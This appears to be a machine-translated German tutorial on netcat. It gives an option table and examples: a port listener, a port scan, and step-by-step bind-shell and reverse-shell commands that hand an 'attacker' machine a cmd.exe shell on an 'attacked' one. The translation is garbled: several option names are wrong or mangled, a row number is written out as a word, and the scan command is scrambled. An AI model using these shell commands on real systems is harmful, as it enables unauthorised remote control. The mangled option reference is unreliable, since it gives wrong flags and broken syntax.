NC ist die Abkürzung für netcat und wird in der Netzwerksicherheitswelt als "Schweizer Taschenmesser" bezeichnet. Es verwendet das TCP- oder UDP-Protokoll zum Verbinden und Lesen von Daten. Es ist als stabiles Backdoor-Tool konzipiert, das problemlos direkt von anderen Programmen und Skripten gesteuert werden kann. Gleichzeitig ist es ein leistungsstarkes Tool zum Debuggen und Erkennen von Netzwerken, mit dem nahezu alle Arten von Netzwerkverbindungen hergestellt werden können
nc [-Optionen] Hostname Port [s] [Ports]…
Seriennummer | Code | Wirkung |
---|---|---|
01 | -d | Im Hintergrund ausführen |
02 | -der Prog | Sobald die Programmumleitung verbunden ist, führen Sie das gebundene Programm aus (gefährlicher). |
03 | -G | Quell-Routing-Hop-Punkt, nicht mehr als acht Mal |
04 | -G | Quell-Routing-Anzeigen 4, 8, 12, ... |
05 | -h | Hilfeinformationen |
06 | -i Sek | Einstellung der Verzögerungszeit, die beim Scannen des Ports verwendet wird |
07 | -l | Überwachungsmodus, wartet auf Verbindung. Nach Abschluss der Verbindung wird die Überwachung beendet |
08 | -L | Überwachungsmodus, wartet auf Verbindung. Fahren Sie nach Abschluss der Verbindung mit der Überwachung fort |
09 | -n | IP-Adresse in digitaler Form |
10 | -o Datei | Geben Sie den zu übertragenden Hexadezimalcode an |
11 | -P Port | Geben Sie die lokale Portnummer an |
12 | -r | Geben Sie zufällig die lokale 0 oder die Remote-Portnummer an |
13 | -s addr | Lokale Quelladresse |
14 | -t | Beantworten Sie eingehende Anfragen als Telnet |
fünfzehn | -u | UDP-Methode |
16 | -v | Details anzeigen |
17 | -w | Zeitlimit angeben |
18 | -mit | E / A-Modus, der während des Scannens verwendet wird |
Zum Beispiel:
1. Wenden Sie die GET-Methode http / 1.1 an
- Kopieren Sie den Befehl nc in das Stammverzeichnis des Laufwerks c
- Wechseln Sie in den Dos-Modus und ziehen Sie sich zur Wurzel zurück
- Typ nc -l -p 80: Überwachen Sie den Eingang von Port 80
- Geben Sie die IP-Adresse dieses Computers oder 127.0.0.1 ein, um Port 80 zu verwenden
2. Stellen Sie eine Verbindung zu Port 80 her
- Geben Sie dos ein und ziehen Sie sich zurück, um zu folgen
- Typ nc -l -p 80: Überwachen Sie den Eingang von Port 80
- Öffnen Sie dann eine lokale IP 80 oder 127.0.0.1 80 von dos telnet, um die Verknüpfung anzuzeigen
3. Scannen Sie den Remote - Host 192.168.0.103 alle Ports von 80-445
Eröffnung
des Formats: -nvv NC -W2 die -Z 192.168.0.103 80-445
4. Vorwärts - Link: Kampfflugzeug 192.168.0.100, 192.168.0.103 Angriff Maschine
Aufgabe: Verbinden Sie den angreifenden Computer 192.168.0.100 über Port 80 mit dem angegriffenen Computer 192.168.0.103 und bedienen Sie das Laufwerk C des angegriffenen Computers in Echtzeit.
Schritt 1 Binden Sie die Shell an Port 80 des angegriffenen Computers 192.168.0.103.
Format: nc -vv –l –p 80 –e cmd.exe
Schritt 2 Der Angreifer 192.168.0.100 stellt über Port 80 eine Verbindung zum Host 192.168.0.103 her und erhält die Shell des Remote-Hosts.
Format: nc 192.168.0.103 80
training 5 Verbindung
rückgängig machen : angreifende Maschine 192.168.0.100, angegriffene Maschine 192.168.0.103 Aufgabe: Verbindung von angreifender Maschine 192.168.0.100 zu angegriffener Maschine 192.168.0.103 über Port 8080 umkehren Und Echtzeitbetrieb des C-Laufwerks der angegriffenen Maschine.
Schritt 1 Der Angreifer 192.168.0.100 überwacht seinen Port 8080.
Format: nc -vv –l –p 8080
Schritt 2 Der angegriffene Computer 192.168.0.103 bindet die Shell an den 8080-Port des Angreifers, sodass der Angreifer die Shell des angegriffenen Computers umgekehrt erhält.
Format: nc –e cmd.exe 192.168.0.100 8080